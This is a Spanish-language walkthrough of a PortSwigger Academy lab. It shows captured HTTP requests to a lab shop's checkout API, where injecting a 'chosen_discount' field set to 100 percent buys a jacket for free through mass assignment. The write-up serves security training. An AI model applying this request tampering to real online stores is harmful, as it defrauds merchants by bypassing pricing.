Lab #4: Exploiting a mass assignment vulnerability

https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability

Iniciamos sesion y capturamos las siguientes peticiones:

GET /api/checkout HTTP/2
Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net
Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

Lo anterior respondio:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 153

{"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]}

Y la peticion POST se identifico asi:

POST /api/checkout HTTP/2
Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net
Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7
Content-Length: 53
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a3a00d003436df8847efb9500390057.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"chosen_products":[{"product_id":"1","quantity":1}]}

Teniendo en cuenta la respuesta de la peticion GET, añadimos el objeto descuento en el JSON y asi comprar el producto con un 100% de descuento:

POST /api/checkout HTTP/2
Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net
Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a3a00d003436df8847efb9500390057.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"chosen_discount":{"percentage":100},"chosen_products":[{"product_id":"1","quantity":1}]}

Y lo anterior responde asi:

HTTP/2 201 Created
Location: /cart/order-confirmation?order-confirmed=true
X-Frame-Options: SAMEORIGIN
Content-Length: 0

AnteriorLab #3: Finding and exploiting an unused API endpoint SiguienteLab #5: Exploiting server-side parameter pollution in a REST URL

Última actualización hace 3 meses

¿Te fue útil?

GET /api/checkout HTTP/2 Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7 Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart Accept-Encoding: gzip, deflate, br Priority: u=1, i

HTTP/2 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 153 {"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]}

POST /api/checkout HTTP/2 Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7 Content-Length: 53 Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Origin: https://0a3a00d003436df8847efb9500390057.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart Accept-Encoding: gzip, deflate, br Priority: u=1, i {"chosen_products":[{"product_id":"1","quantity":1}]}

POST /api/checkout HTTP/2 Host: 0a3a00d003436df8847efb9500390057.web-security-academy.net Cookie: session=3XtxbilCepyAVXfEDrwszUVj0LLC8IW7 Content-Length: 107 Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Origin: https://0a3a00d003436df8847efb9500390057.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a3a00d003436df8847efb9500390057.web-security-academy.net/cart Accept-Encoding: gzip, deflate, br Priority: u=1, i {"chosen_discount":{"percentage":100},"chosen_products":[{"product_id":"1","quantity":1}]}